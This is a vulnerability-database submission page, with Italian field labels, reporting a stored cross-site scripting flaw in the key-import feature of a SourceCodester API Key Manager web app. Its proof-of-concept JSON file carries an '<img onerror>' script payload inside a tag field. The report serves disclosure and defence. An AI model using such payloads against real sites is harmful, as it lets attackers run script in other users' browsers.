| Titolo | SourceCodester API Key Manager App Using HTML, CSS and JavaScript with Source Code 0 Cross Site Scripting |
|---|
| Descrizione | The vulnerability lies in the import keys functionality where any user can define additional tags having JavaSctipt payloads. On load, the payload is executed within the local browser.
[
{
"id": "xss_tag_1",
"name": "Legitimate API Key",
"key": "sk_live_1234567890abcdef",
"category": "payment",
"tags": [
"production",
"<img src=x onerror=alert(1);>", // Exploit
"important"
],
"notes": "This key is used for production payments",
"created": "2026-01-03T17:41:04.147892Z",
"lastUsed": null,
"strength": "Strong"
}
]
Codebase: https://www.sourcecodester.com/javascript/18600/api-key-manager-app-using-html-css-and-javascript-source-code.html |
|---|
| Utente | Kamran Saifullah (UID 4218) |
|---|
| Sottomissione | 03/01/2026 20:40 (7 mesi fa) |
|---|
| Moderazione | 04/01/2026 07:47 (11 hours later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 339472 [SourceCodester API Key Manager App 1.0 Import Key cross site scripting] |
|---|
| Punti | 17 |
|---|